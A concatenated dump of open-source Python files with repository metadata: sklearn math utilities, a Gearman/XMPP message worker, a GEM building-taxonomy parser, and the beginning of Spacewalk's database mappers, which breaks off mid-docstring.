Returns log(sum(exp(arr))) while minimizing the possibility of
over/underflow.
Examples
--------
>>> import numpy as np
>>> from sklearn.utils.extmath import logsumexp
>>> a = np.arange(10)
>>> np.log(np.sum(np.exp(a)))
9.4586297444267107
>>> logsumexp(a)
9.4586297444267107
"""
arr = np.rollaxis(arr, axis)
# Use the max to normalize, as with the log this is what accumulates
# the less errors
vmax = arr.max(axis=0)
out = np.log(np.sum(np.exp(arr - vmax), axis=0))
out += vmax
return out
def weighted_mode(a, w, axis=0):
"""Returns an array of the weighted modal (most common) value in a
If there is more than one such value, only the first is returned.
The bin-count for the modal bins is also returned.
This is an extension of the algorithm in scipy.stats.mode.
Parameters
----------
a : array_like
n-dimensional array of which to find mode(s).
w : array_like
n-dimensional array of weights for each value
axis : int, optional
Axis along which to operate. Default is 0, i.e. the first axis.
Returns
-------
vals : ndarray
Array of modal values.
score : ndarray
Array of weighted counts for each mode.
Examples
--------
>>> from sklearn.utils.extmath import weighted_mode
>>> x = [4, 1, 4, 2, 4, 2]
>>> weights = [1, 1, 1, 1, 1, 1]
>>> weighted_mode(x, weights)
(array([ 4.]), array([ 3.]))
The value 4 appears three times: with uniform weights, the result is
simply the mode of the distribution.
>>> weights = [1, 3, 0.5, 1.5, 1, 2] # deweight the 4's
>>> weighted_mode(x, weights)
(array([ 2.]), array([ 3.5]))
The value 2 has the highest score: it appears twice with weights of
1.5 and 2: the sum of these is 3.
See Also
--------
scipy.stats.mode
"""
if axis is None:
a = np.ravel(a)
w = np.ravel(w)
axis = 0
else:
a = np.asarray(a)
w = np.asarray(w)
axis = axis
if a.shape != w.shape:
w = np.zeros(a.shape, dtype=w.dtype) + w
scores = np.unique(np.ravel(a)) # get ALL unique values
testshape = list(a.shape)
testshape[axis] = 1
oldmostfreq = np.zeros(testshape)
oldcounts = np.zeros(testshape)
for score in scores:
template = np.zeros(a.shape)
ind = (a == score)
template[ind] = w[ind]
counts = np.expand_dims(np.sum(template, axis), axis)
mostfrequent = np.where(counts > oldcounts, score, oldmostfreq)
oldcounts = np.maximum(counts, oldcounts)
oldmostfreq = mostfrequent
return mostfrequent, oldcounts
def pinvh(a, cond=None, rcond=None, lower=True):
    """Compute the (Moore-Penrose) pseudo-inverse of a hermitian matrix.
Calculate a generalized inverse of a symmetric matrix using its
eigenvalue decomposition and including all 'large' eigenvalues.
Parameters
----------
a : array, shape (N, N)
        Real symmetric or complex hermitian matrix to be pseudo-inverted
cond : float or None, default None
Cutoff for 'small' eigenvalues.
Singular values smaller than rcond * largest_eigenvalue are considered
zero.
If None or -1, suitable machine precision is used.
rcond : float or None, default None (deprecated)
Cutoff for 'small' eigenvalues.
Singular values smaller than rcond * largest_eigenvalue are considered
zero.
If None or -1, suitable machine precision is used.
lower : boolean
Whether the pertinent array data is taken from the lower or upper
triangle of a. (Default: lower)
Returns
-------
B : array, shape (N, N)
Raises
------
LinAlgError
If eigenvalue does not converge
Examples
--------
>>> import numpy as np
>>> a = np.random.randn(9, 6)
>>> a = np.dot(a, a.T)
>>> B = pinvh(a)
>>> np.allclose(a, np.dot(a, np.dot(B, a)))
True
>>> np.allclose(B, np.dot(B, np.dot(a, B)))
True
"""
a = np.asarray_chkfinite(a)
s, u = linalg.eigh(a, lower=lower)
if rcond is not None:
cond = rcond
if cond in [None, -1]:
t = u.dtype.char.lower()
factor = {'f': 1E3, 'd': 1E6}
cond = factor[t] * np.finfo(t).eps
# unlike svd case, eigh can lead to negative eigenvalues
above_cutoff = (abs(s) > cond * np.max(abs(s)))
psigma_diag = np.zeros_like(s)
psigma_diag[above_cutoff] = 1.0 / s[above_cutoff]
return np.dot(u * psigma_diag, np.conjugate(u).T)
def cartesian(arrays, out=None):
"""Generate a cartesian product of input arrays.
Parameters
----------
arrays : list of array-like
1-D arrays to form the cartesian product of.
out : ndarray
Array to place the cartesian product in.
Returns
-------
out : ndarray
2-D array of shape (M, len(arrays)) containing cartesian products
formed of input arrays.
Examples
--------
>>> cartesian(([1, 2, 3], [4, 5], [6, 7]))
array([[1, 4, 6],
[1, 4, 7],
[1, 5, 6],
[1, 5, 7],
[2, 4, 6],
[2, 4, 7],
[2, 5, 6],
[2, 5, 7],
[3, 4, 6],
[3, 4, 7],
[3, 5, 6],
[3, 5, 7]])
"""
arrays = [np.asarray(x) for x in arrays]
shape = (len(x) for x in arrays)
dtype = arrays[0].dtype
ix = np.indices(shape)
ix = ix.reshape(len(arrays), -1).T
if out is None:
out = np.empty_like(ix, dtype=dtype)
    for n, arr in enumerate(arrays):
        out[:, n] = arr[ix[:, n]]
return out
def svd_flip(u, v, u_based_decision=True):
"""Sign correction to ensure deterministic output from SVD.
Adjusts the columns of u and the rows of v such that the loadings in the
columns in u that are largest in absolute value are always positive.
Parameters
----------
u, v : ndarray
u and v are the output of `linalg.svd` or
`sklearn.utils.extmath.randomized_svd`, with matching inner dimensions
so one can compute `np.dot(u * s, v)`.
u_based_decision : boolean, (default=True)
If True, use the columns of u as the basis for sign flipping.
Otherwise, use the rows of v. The choice of which variable to base the
decision on is generally algorithm dependent.
Returns
-------
u_adjusted, v_adjusted : arrays with the same dimensions as the input.
"""
if u_based_decision:
# columns of u, rows of v
max_abs_cols = np.argmax(np.abs(u), axis=0)
signs = np.sign(u[max_abs_cols, xrange(u.shape[1])])
u *= signs
v *= signs[:, np.newaxis]
else:
# rows of v, columns of u
max_abs_rows = np.argmax(np.abs(v), axis=1)
signs = np.sign(v[xrange(v.shape[0]), max_abs_rows])
u *= signs
v *= signs[:, np.newaxis]
return u, v
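# Usage sketch (illustrative): makes SVD output deterministic without changing
# the reconstruction, since the matching sign flips cancel in np.dot(u * s, v):
#
#     u, s, v = linalg.svd(X, full_matrices=False)
#     u, v = svd_flip(u, v)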
def log_logistic(X, out=None):
"""Compute the log of the logistic function, ``log(1 / (1 + e ** -x))``.
This implementation is numerically stable because it splits positive and
negative values::
-log(1 + exp(-x_i)) if x_i > 0
x_i - log(1 + exp(x_i)) if x_i <= 0
For the ordinary logistic function, use ``sklearn.utils.fixes.expit``.
Parameters
----------
X : array-like, shape (M, N) or (M, )
Argument to the logistic function
out : array-like, shape: (M, N) or (M, ), optional:
Preallocated output array.
Returns
-------
out : array, shape (M, N) or (M, )
Log of the logistic function evaluated at every point in x
Notes
-----
See the blog post describing this implementation:
http://fa.bianp.net/blog/2013/numerical-optimizers-for-logistic-regression/
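    Examples
    --------
    Illustrative doctest (``+SKIP`` because exact float formatting differs
    across numpy versions); log_logistic(0) is log(1/2):
    >>> log_logistic(np.array([0., 0.]))  # doctest: +SKIP
    array([-0.69314718, -0.69314718])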
"""
is_1d = X.ndim == 1
X = np.atleast_2d(X)
X = check_array(X, dtype=np.float64)
n_samples, n_features = X.shape
if out is None:
out = np.empty_like(X)
_log_logistic_sigmoid(n_samples, n_features, X, out)
if is_1d:
return np.squeeze(out)
return out
def softmax(X, copy=True):
"""
Calculate the softmax function.
The softmax function is calculated by
np.exp(X) / np.sum(np.exp(X), axis=1)
This will cause overflow when large values are exponentiated.
Hence the largest value in each row is subtracted from each data
point to prevent this.
Parameters
----------
X : array-like, shape (M, N)
        Argument to the softmax function
copy : bool, optional
Copy X or not.
Returns
-------
out : array, shape (M, N)
Softmax function evaluated at every point in x
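    Examples
    --------
    Illustrative doctest (``+SKIP`` because exact float formatting differs
    across numpy versions); each row sums to 1:
    >>> softmax(np.array([[0., 1., 2.]]))  # doctest: +SKIP
    array([[ 0.09003057,  0.24472847,  0.66524096]])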
"""
if copy:
X = np.copy(X)
max_prob = np.max(X, axis=1).reshape((-1, 1))
X -= max_prob
np.exp(X, X)
sum_prob = np.sum(X, axis=1).reshape((-1, 1))
X /= sum_prob
return X
def safe_min(X):
"""Returns the minimum value of a dense or a CSR/CSC matrix.
    Adapted from http://stackoverflow.com/q/13426580
"""
if issparse(X):
if len(X.data) == 0:
return 0
m = X.data.min()
return m if X.getnnz() == X.size else min(m, 0)
else:
return X.min()
def make_nonnegative(X, min_value=0):
"""Ensure `X.min()` >= `min_value`."""
min_ = safe_min(X)
if min_ < min_value:
if issparse(X):
raise ValueError("Cannot make the data matrix"
" nonnegative because it is sparse."
" Adding a value to every entry would"
" make it no longer sparse.")
X = X + (min_value - min_)
return X
def _incremental_mean_and_var(X, last_mean=.0, last_variance=None,
last_sample_count=0):
"""Calculate mean update and a Youngs and Cramer variance update.
    last_mean and last_variance are statistics computed at the last step by the
    function. Both must be initialized to 0.0. If no scaling is required,
    last_variance can be None. The mean is always required and returned because
    it is necessary for the calculation of the variance. last_sample_count is
    the number of samples encountered until now.
From the paper "Algorithms for computing the sample variance: analysis and
recommendations", by Chan, Golub, and LeVeque.
Parameters
----------
X : array-like, shape (n_samples, n_features)
Data to use for variance update
last_mean : array-like, shape: (n_features,)
last_variance : array-like, shape: (n_features,)
last_sample_count : int
Returns
-------
updated_mean : array, shape (n_features,)
updated_variance : array, shape (n_features,)
        None if last_variance was None; in that case only the mean is computed
updated_sample_count : int
References
----------
    T. Chan, G. Golub, R. LeVeque. Algorithms for computing the sample
    variance: analysis and recommendations, The American Statistician,
    Vol. 37, No. 3, pp. 242-247
Also, see the sparse implementation of this in
`utils.sparsefuncs.incr_mean_variance_axis` and
`utils.sparsefuncs_fast.incr_mean_variance_axis0`
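    Examples
    --------
    Illustrative doctest (``+SKIP`` because exact array formatting differs
    across numpy versions); starting from zero seen samples, with no
    variance requested:
    >>> X = np.array([[1., 2.], [3., 4.]])
    >>> _incremental_mean_and_var(X)  # doctest: +SKIP
    (array([ 2.,  3.]), None, 2)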
"""
# old = stats until now
# new = the current increment
# updated = the aggregated stats
last_sum = last_mean * last_sample_count
new_sum = X.sum(axis=0)
new_sample_count = X.shape[0]
updated_sample_count = last_sample_count + new_sample_count
updated_mean = (last_sum + new_sum) / updated_sample_count
if last_variance is None:
updated_variance = None
else:
new_unnormalized_variance = X.var(axis=0) * new_sample_count
if last_sample_count == 0: # Avoid division by 0
updated_unnormalized_variance = new_unnormalized_variance
else:
last_over_new_count = last_sample_count / new_sample_count
last_unnormalized_variance = last_variance * last_sample_count
updated_unnormalized_variance = (
last_unnormalized_variance +
new_unnormalized_variance +
last_over_new_count / updated_sample_count *
(last_sum / last_over_new_count - new_sum) ** 2)
updated_variance = updated_unnormalized_variance / updated_sample_count
return updated_mean, updated_variance, updated_sample_count
def _deterministic_vector_sign_flip(u):
"""Modify the sign of vectors for reproducibility
Flips the sign of elements of all the vectors (rows of u) such that
the absolute maximum element of each vector is positive.
Parameters
----------
u : ndarray
Array with vectors as its rows.
Returns
-------
u_flipped : ndarray with same shape as u
Array with the sign flipped vectors as its rows.
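    Examples
    --------
    Illustrative doctest (``+SKIP`` because exact float formatting differs
    across numpy versions); the row is flipped because its absolute
    maximum, -3, is negative:
    >>> _deterministic_vector_sign_flip(np.array([[-1., 2., -3.]]))  # doctest: +SKIP
    array([[ 1., -2.,  3.]])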
"""
max_abs_rows = np.argmax(np.abs(u), axis=1)
signs = np.sign(u[range(u.shape[0]), max_abs_rows])
u *= signs[:, np.newaxis]
return u
def stable_cumsum(arr, axis=None, rtol=1e-05, atol=1e-08):
"""Use high precision for cumsum and check that final value matches sum
Parameters
----------
arr : array-like
        Array to be cumulatively summed; flattened if ``axis`` is None
axis : int, optional
Axis along which the cumulative sum is computed.
The default (None) is to compute the cumsum over the flattened array.
rtol : float
Relative tolerance, see ``np.allclose``
atol : float
Absolute tolerance, see ``np.allclose``
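    Returns
    -------
    out : ndarray
        Cumulative sum, computed in float64 precision.
    Examples
    --------
    Illustrative doctest (``+SKIP`` because exact float formatting differs
    across numpy versions):
    >>> stable_cumsum(np.array([1, 2, 3]))  # doctest: +SKIP
    array([ 1.,  3.,  6.])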
"""
# sum is as unstable as cumsum for numpy < 1.9
if np_version < (1, 9):
return np.cumsum(arr, axis=axis, dtype=np.float64)
out = np.cumsum(arr, axis=axis, dtype=np.float64)
expected = np.sum(arr, axis=axis, dtype=np.float64)
if not np.all(np.isclose(out.take(-1, axis=axis), expected, rtol=rtol,
atol=atol, equal_nan=True)):
warnings.warn('cumsum was found to be unstable: '
'its last element does not correspond to sum',
RuntimeWarning)
return out
| IshankGulati/scikit-learn | sklearn/utils/extmath.py | Python | bsd-3-clause | 27,505 |
#!/usr/bin/env python
import sleekxmpp
import sys
import gearman
import base64
import json
import logging
import configparser
CONFIG_FILE = '/home/django/projects/fun/fun/jabber.conf'
config = configparser.ConfigParser()
config.read(CONFIG_FILE)
logging.basicConfig(format='%(asctime)s [JABBER] %(message)s', filename=config.get('Global', 'log_file'), level=logging.DEBUG)
if sys.version_info < (3, 0):
from sleekxmpp.util.misc_ops import setdefaultencoding
setdefaultencoding('utf8')
else:
raw_input = input
class SendMsgBot(sleekxmpp.ClientXMPP):
def __init__(self, jid, password, recipient, message):
sleekxmpp.ClientXMPP.__init__(self, jid, password)
self.recipient = recipient
self.message = message
self.add_event_handler("session_start", self.start, threaded=True)
def start(self, event):
self.send_presence()
self.get_roster()
self.send_message(mto=self.recipient, mbody=self.message, mtype='chat')
self.disconnect(wait=True)
def task_jabber(job):
logging.debug("TEST: %s" % base64.b64decode(job.workload).decode('utf-8'))
data = json.loads(base64.b64decode(job.workload).decode('utf-8'))
username = config.get('Global', 'jabber_user')
password = config.get('Global', 'jabber_pass')
logging.info("Received message for " + data['recipient'])
xmpp = SendMsgBot(username, password, data['recipient'].strip(), data['message'])
xmpp.register_plugin('xep_0030') # Service Discovery
xmpp.register_plugin('xep_0045') # Multi-User Chat
xmpp.register_plugin('xep_0071') # HTML-IM
xmpp.register_plugin('xep_0199') # XMPP Ping
if xmpp.connect():
xmpp.process(block=True)
message = "Message sent."
logging.info(message)
else:
message = "Cannot connect to jabber server."
logging.error(message)
return base64.b64encode(bytes(json.dumps(message), 'utf-8'))
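# Illustrative client-side sketch (not part of this worker): a submitter
# base64-encodes a JSON payload with 'recipient' and 'message' keys, e.g.
#
#   client = gearman.Client()
#   client.add_servers('127.0.0.1:4730')
#   payload = base64.b64encode(bytes(json.dumps(
#       {'recipient': 'user@example.com', 'message': 'hello'}), 'utf-8'))
#   client.do('jabber', payload)
#
# 'Client', 'add_servers' and 'do' here mirror the Worker API used below and
# are assumptions, not verified against the installed gearman module.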
worker = gearman.Worker()
worker.add_servers('127.0.0.1:4730')
worker.add_func('jabber', task_jabber)
logging.info("Starting jabber worker...")
while True:
worker.work()
| mitaka/fun | workers/jabber.py | Python | gpl-2.0 | 2,127 |
# Copyright (c) 2011-2013, ImageCat Inc.
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU Affero General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU Affero General Public License for more details.
#
# You should have received a copy of the GNU Affero General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>.
#
"""
module supporting GEM taxonomy version 1
"""
import sqlite3
import os
import re
import copy
from operator import attrgetter
from sidd.constants import logAPICall
from sidd.taxonomy import Taxonomy, TaxonomyAttributeGroup, TaxonomyAttribute, TaxonomyAttributeValue, TaxonomyAttributeCode
from sidd.taxonomy import TaxonomyError, TaxonomyParseError
from sidd.taxonomy import TaxonomyAttributeMulticodeValue, TaxonomyAttributePairValue, TaxonomyAttributeSinglecodeValue
class GemTaxonomy(Taxonomy):
"""
main taxonomy class
"""
# protected member attributes
__GEM_TAXONOMY_FILE = 'gemdb.db'
def __init__(self):
db_path = os.path.dirname( __file__ ) + os.path.sep + self.__GEM_TAXONOMY_FILE
if not os.path.exists(db_path):
raise TaxonomyError("gem taxonomy db not found")
# open associated sqlite DB and load attributes
self.__initialized = False
self.__initialize(db_path)
@property
def name(self):
return "Gem"
@property
def description(self):
return "Gem Taxonomy"
@property
def version(self):
return "1.0"
@property
def attribute_groups(self):
return self.__attrGroups
@property
def attributes(self):
return self.__attrs
@property
def codes(self):
return self.__codes
def get_separator(self, separator_type):
if separator_type == GemTaxonomy.Separators.AttributeGroup:
return GemTaxonomyAttributeGroup.Separator
elif separator_type == GemTaxonomy.Separators.Attribute:
return GemTaxonomyAttribute.Separator
elif separator_type == GemTaxonomy.Separators.AttributeValue:
return GemTaxonomyAttributeValue.Separator
else:
raise TaxonomyError("Separator Type (%s) not supported" % separator_type)
def get_attribute_group_by_name(self, name):
for grp in self.__attrGroups:
if grp.name == name:
return grp
return None
def get_attribute_by_name(self, name):
for attr in self.__attrs:
if attr.name == name:
return attr
return None
def get_code_by_name(self, name):
if self.__codes.has_key(name):
return self.__codes[name]
return None
def get_code_by_attribute(self, attribute_name, parent_code=None):
has_rule = False
if isinstance(parent_code, TaxonomyAttributeCode):
parent_lookup = parent_code.attribute.lookup_table
child_lookup = self.get_attribute_by_name(attribute_name).lookup_table
rule_key = '%s|%s' % (parent_lookup, child_lookup)
has_rule = self.rules.has_key(rule_key)
if has_rule:
rule = self.rules[rule_key]
if not rule.has_key(parent_code):
return
for code in rule[parent_code]:
yield code
else:
for code in self.__codes.values():
if code.attribute.name == attribute_name:
yield code
def has_rule(self, attribute):
if type(attribute) == str:
attribute = self.get_attribute_by_name(attribute)
for keys in self.rules.keys():
if keys.find(attribute.lookup_table) >= 0:
return True
return False
@logAPICall
def parse(self, taxonomy_str):
str_attrs = str(taxonomy_str).split('/')
        if len(str_attrs) == 0 or str_attrs == ['']:
raise TaxonomyParseError("Incorrect format")
attributes = []
for attr in str_attrs:
# determine type
            if re.match(r'\w+(\+\w+)+', attr):
# multiple codes, split and search each
levels = attr.split('+')
for lvl in levels:
if not self.__codes.has_key(lvl):
raise TaxonomyParseError('%s is not a valid taxonomy code' %(lvl))
code = self.__codes[lvl]
codeValue = GemTaxonomyAttributeSinglecodeValue(code.attribute)
codeValue.add_value(code)
attributes.append(codeValue)
            elif re.match(r'\w+:\d*', attr):
# code:value format
(type_id, val) = attr.split(':')
if not self.__codes.has_key(type_id):
raise TaxonomyParseError('%s is not a valid taxonomy code' %(type_id))
code = self.__codes[type_id]
codeValue = GemTaxonomyAttributePairValue(code.attribute)
codeValue.add_value(code, val)
attributes.append(codeValue)
            elif re.match(r'\w+', attr):
# code only, search code table
if not self.__codes.has_key(attr):
raise TaxonomyParseError('%s is not a valid taxonomy code' %(attr))
code = self.__codes[attr]
codeValue = GemTaxonomyAttributeSinglecodeValue(code.attribute)
codeValue.add_value(code)
attributes.append(codeValue)
return attributes
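    # Illustrative sketch (assuming the codes exist in the bundled gemdb.db):
    # parse() turns each '/'-separated group into attribute values, e.g.
    #
    #   taxonomy = GemTaxonomy()
    #   values = taxonomy.parse('MUR+CL99/HEX:2')
    #
    # would yield single-code values for 'MUR' and 'CL99' plus a pair value
    # for 'HEX' carrying the value '2'.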
def is_valid_string(self, tax_string):
return True
@logAPICall
def to_string2(self, taxonomy_values, order_attributes=False, fill_missing=False):
""" serialize a set of taxonomy values into GEM specific taxonomy string """
vals = self.parse("/".join([str(n) for n in taxonomy_values]))
if (fill_missing):
to_add = [g.name for g in self.attribute_groups]
for v in vals:
try:
to_add.remove(v.code.attribute.group.name)
                except ValueError:
pass
str_add = []
for name in to_add:
str_add.append(self.get_attribute_group_by_name(name).default)
vals = vals + self.parse("/".join(str_add))
order_attributes=True
if (order_attributes):
vals.sort(key=attrgetter('code.attribute.group.order'))
out_str = []
for idx, v in enumerate(vals):
if idx > 0:
if v.code.attribute.group.order == vals[idx-1].code.attribute.group.order:
out_str.append(GemTaxonomyAttribute.Separator)
else:
out_str.append(GemTaxonomyAttributeGroup.Separator)
out_str.append(str(v))
return "".join(out_str)
@logAPICall
def to_string(self, taxonomy_values, order_attributes=False, fill_missing=False):
""" serialize a set of taxonomy values into GEM specific taxonomy string """
vals = self.parse("/".join([str(n) for n in taxonomy_values]))
if not order_attributes:
out_str = []
for idx, v in enumerate(vals):
if idx > 0:
if v.code.attribute.group.order == vals[idx-1].code.attribute.group.order:
out_str.append(GemTaxonomyAttribute.Separator)
else:
out_str.append(GemTaxonomyAttributeGroup.Separator)
out_str.append(str(v))
return "".join(out_str)
else:
out_str = ['']*len(self._output_str)
# set directions
out_str[0], out_str[3] = 'DX','DY'
vals.sort(key=lambda val:val.code.attribute.group.order*100+val.code.attribute.order)
for v in vals:
g_name = v.attribute.group.name
idxlist = [i for i,val in enumerate(self._output_str) if val==g_name]
for idx in idxlist:
if out_str[idx] == '':
out_str[idx] = str(v)
else:
out_str[idx] = "%s+%s" % (out_str[idx], str(v))
return "/".join(out_str)
def __initialize(self, db_path):
"""
prepare parser
- load attributes and codes from underlying db
"""
if self.__initialized:
return
logAPICall.log('initialize taxonomy from database %s' % db_path, logAPICall.DEBUG)
# load attributes / code from DB for parsing
conn = sqlite3.connect(db_path)
c = conn.cursor()
# load attribute groups
# attribute group default value for fill-in to missing groups
sql = """
select a.attribute, a.default_value from dic_gem_attributes g inner join dic_gem_attribute_levels a on g.attribute=a.attribute where level=1 and order_in_basic <> ''
"""
c.execute(sql)
default_values = {}
for row in c:
default_values[str(row[0])]=str(row[1])
sql = """
select order_in_extended, attribute from dic_gem_attributes g order by order_in_extended asc
"""
c.execute(sql)
output_str = []
for row in c:
output_str.append(str(row[1]))
self._output_str = output_str[:3]+output_str
sql = """
select g.order_in_basic, g.attribute, max(a.level) levels, g.format
from dic_gem_attributes g
inner join dic_gem_attribute_levels a on g.attribute=a.attribute
where order_in_basic <> ''
group by g.order_in_basic, g.attribute, g.format
order by order_in_basic
"""
c.execute(sql)
self.__attrGroups = []
for row in c:
grp = GemTaxonomyAttributeGroup(str(row[1]).strip(), int(row[0]), int(row[2]),
default_values[str(row[1])], int(row[3]))
self.__attrGroups.append(grp)
# load attributes
sql = """
select a.name, a.level, g.attribute, a.format, a.lookup_table
from dic_gem_attributes g
inner join dic_gem_attribute_levels a on g.attribute=a.attribute
where order_in_basic <> ''
group by a.name, a.level, g.attribute, a.lookup_table, a.format
order by g.order_in_basic, a.level
"""
c.execute(sql)
self.__attrs = []
for row in c:
grp = self.get_attribute_group_by_name(str(row[2]).strip())
attr = GemTaxonomyAttribute(str(row[0]).strip(), grp,
int(row[1]), None, int(row[3]))
attr.lookup_table = str(row[4])
grp.add_attribute(attr)
self.__attrs.append(attr)
# load codes
sql = """select code, description, scope from %s"""
self.__codes = {}
for attr in self.__attrs:
if attr.lookup_table == "":
continue
c.execute(sql % attr.lookup_table)
for row in c:
code_value = str(row[0]).strip()
code = TaxonomyAttributeCode(attr,
code_value, str(row[1]).strip(), str(row[2]).strip())
self.__codes[code_value] = code
attr.add_code(code)
# load rules
sql = """ select parent_table, child_table, parent_code, child_code from GEM_RULES """
c.execute(sql)
self.rules = {}
for row in c:
rule_key = '%s|%s' % (str(row[0]).strip(), str(row[1]).strip())
parent_code = self.__codes[str(row[2]).strip()]
child_code = self.__codes[str(row[3]).strip()]
if not self.rules.has_key(rule_key):
self.rules[rule_key] = {}
rule = self.rules[rule_key]
if not rule.has_key(parent_code):
rule[parent_code] = []
rule[parent_code].append(child_code)
conn.close()
self.__initialized=True
class GemTaxonomyAttribute(TaxonomyAttribute):
"""
Gem taxonomy attribute. used to create range strings and validate strings
"""
(EXACT, RANGE, APP, PRE) = range(4)
Separator = "+"
def __init__(self, name="", attribute_group=None, order=1, default="", attribute_type=1, codes=None):
super(GemTaxonomyAttribute, self).__init__(name, attribute_group, order, default, attribute_type, codes)
def make_string(self, values, qualifier=None):
if self.type == 1:
return '+'.join([str(v) for v in values])
else:
if qualifier is None:
if (values[0] is not None and values[1] is not None):
qualifier=GemTaxonomyAttribute.RANGE
else:
qualifier=GemTaxonomyAttribute.EXACT
if self.name == "Height":
# construct valid height string from given values
if (values[0] is None or values[1] is None) or (values[0] == 0 and values[1] == 0):
return "H99"
elif qualifier==GemTaxonomyAttribute.EXACT:
return "HEX:%s" % ( values[0] )
elif qualifier==GemTaxonomyAttribute.RANGE:
return "HBET:%s,%s" % (values[0], values[1])
else:
return "H99"
elif self.name == "Date of Construction":
# construct valid date of construction string from given values
if (values[0] is None or values[1] is None) or (values[0] == 0 and values[1] == 0):
return "Y99"
elif qualifier==GemTaxonomyAttribute.PRE:
return "YPRE:%s" % ( values[0] )
elif qualifier==GemTaxonomyAttribute.APP:
return "YAPP:%s" % ( values[0] )
elif qualifier==GemTaxonomyAttribute.RANGE:
return "YBET:%s,%s" % (values[0], values[1])
else:
return "Y99"
class GemTaxonomyAttributeGroup(TaxonomyAttributeGroup):
"""
    Gem taxonomy attribute group, e.g. Height or Date of Construction
"""
Separator = "/"
def __init__(self, name="", order=1, levels=1, default="", attribute_type=1, attributes=None):
super(GemTaxonomyAttributeGroup, self).__init__(name, order, levels, default, attribute_type, attributes)
def make_string(self, values, qualifier=None):
raise NotImplementedError("abstract method not implemented")
class GemTaxonomyAttributeValue(TaxonomyAttributeValue):
"""
    This is an abstract class that can be derived to store a valid value
    for a taxonomy attribute
"""
Separator = ":"
def __init__(self, attribute):
""" constructor """
super(GemTaxonomyAttributeValue, self).__init__(attribute)
class GemTaxonomyAttributeMulticodeValue(TaxonomyAttributeMulticodeValue):
"""
Gem taxonomy multicode value used for
- height
- yearbuilt
"""
def __init__(self, attribute):
TaxonomyAttributeMulticodeValue.__init__(self, attribute)
def __str__(self):
""" string representation """
outstr=""
total = len(self.codes)
if total == 0:
return outstr
# first code is primary
        outstr = self.codes[0].code
for i in range(1, total):
outstr += '+%s' % (self.codes[i].code)
#outstr += "/"
return outstr
class GemTaxonomyAttributeSinglecodeValue(TaxonomyAttributeSinglecodeValue):
"""
    Gem taxonomy single-code value (an attribute with exactly one code)
"""
def __init__(self, attribute):
""" constructor """
TaxonomyAttributeSinglecodeValue.__init__(self, attribute)
def __str__(self):
""" string representation """
if self.code is not None:
return self.code.code
else:
return ""
class GemTaxonomyAttributePairValue(TaxonomyAttributePairValue):
"""
    Gem taxonomy code:value pair, e.g. 'HEX:2'
"""
def __init__(self, attribute):
""" constructor """
TaxonomyAttributePairValue.__init__(self, attribute)
def __str__(self):
""" string representation """
if self.code is not None:
if self.value is not None and self.value != "":
return self.code.code + ":" + self.value
else:
return self.code.code
else:
return "" | gem/sidd | sidd/taxonomy/gem/taxonomy.py | Python | agpl-3.0 | 17,545 |
#
# Copyright (c) 2008--2013 Red Hat, Inc.
#
# This software is licensed to you under the GNU General Public License,
# version 2 (GPLv2). There is NO WARRANTY for this software, express or
# implied, including the implied warranties of MERCHANTABILITY or FITNESS
# FOR A PARTICULAR PURPOSE. You should have received a copy of GPLv2
# along with this software; if not, see
# http://www.gnu.org/licenses/old-licenses/gpl-2.0.txt.
#
# Red Hat trademarks are not licensed under GPLv2. No permission is
# granted to use or replicate Red Hat trademarks that are incorporated
# in this software or its documentation.
#
#
# Classes for mapping domain objects to the rhn db.
#
import os.path
import re
import time
from spacewalk.common import rhnCache
from spacewalk.common.rhnConfig import CFG
from spacewalk.server import rhnSQL
import domain
CACHE_PREFIX = "/var/cache/rhn/"
class ChannelMapper:
""" Data Mapper for Channels to the RHN db. """
def __init__(self, pkg_mapper, erratum_mapper, comps_mapper):
self.pkg_mapper = pkg_mapper
self.erratum_mapper = erratum_mapper
self.comps_mapper = comps_mapper
self.channel_details_sql = rhnSQL.prepare("""
select
c.label,
c.name,
ct.label checksum_type
from
rhnChannel c,
rhnChecksumType ct
where c.id = :channel_id
and c.checksum_type_id = ct.id
""")
self.channel_sql = rhnSQL.prepare("""
select
package_id
from
rhnChannelPackage
where
channel_id = :channel_id
""")
self.last_modified_sql = rhnSQL.prepare("""
select
to_char(last_modified, 'YYYYMMDDHH24MISS') as last_modified
from
rhnChannel
where id = :channel_id
""")
self.errata_id_sql = rhnSQL.prepare("""
select
e.id
from
rhnChannelErrata ce,
rhnErrata e
where
ce.channel_id = :channel_id
and e.id = ce.errata_id
""")
self.comps_id_sql = rhnSQL.prepare("""
select
id
from
rhnChannelComps
where
channel_id = :channel_id
order by id desc
""")
self.cloned_from_id_sql = rhnSQL.prepare("""
select
original_id id
from
rhnChannelCloned
where
id = :channel_id
""")
def last_modified(self, channel_id):
""" Get the last_modified field for the provided channel_id. """
self.last_modified_sql.execute(channel_id = channel_id)
return self.last_modified_sql.fetchone()[0]
def get_channel(self, channel_id):
""" Load the channel with id channel_id and its packages. """
self.channel_details_sql.execute(channel_id = channel_id)
details = self.channel_details_sql.fetchone()
channel = domain.Channel(channel_id)
channel.label = details[0]
channel.name = details[1]
channel.checksum_type = details[2]
self.channel_sql.execute(channel_id = channel_id)
package_ids = self.channel_sql.fetchall()
channel.num_packages = len(package_ids)
channel.packages = self._package_generator(package_ids)
channel.errata = self._erratum_generator(channel_id)
self.comps_id_sql.execute(channel_id = channel_id)
comps_id = self.comps_id_sql.fetchone()
if comps_id:
channel.comps = self.comps_mapper.get_comps(comps_id[0])
self.cloned_from_id_sql.execute(channel_id = channel_id)
cloned_row = self.cloned_from_id_sql.fetchone()
if cloned_row is not None:
channel.cloned_from_id = cloned_row[0]
else:
channel.cloned_from_id = None
return channel
def _package_generator(self, package_ids):
for package_id in package_ids:
pkg = self.pkg_mapper.get_package(package_id[0])
yield pkg
def _erratum_generator(self, channel_id):
self.errata_id_sql.execute(channel_id = channel_id)
erratum_ids = self.errata_id_sql.fetchall()
for erratum_id in erratum_ids:
erratum = self.erratum_mapper.get_erratum(erratum_id[0])
yield erratum
class CachedPackageMapper:
""" Data Mapper for Packages to an on-disc cache. """
def __init__(self, mapper):
cache = rhnCache.Cache()
# For more speed, we won't compress.
# cache = rhnCache.CompressedCache(cache)
cache = rhnCache.ObjectCache(cache)
self.cache = rhnCache.NullCache(cache)
self.mapper = mapper
def get_package(self, package_id):
"""
Load the package with id package_id.
Load from the cache, if it is new enough. If not, fall back to the
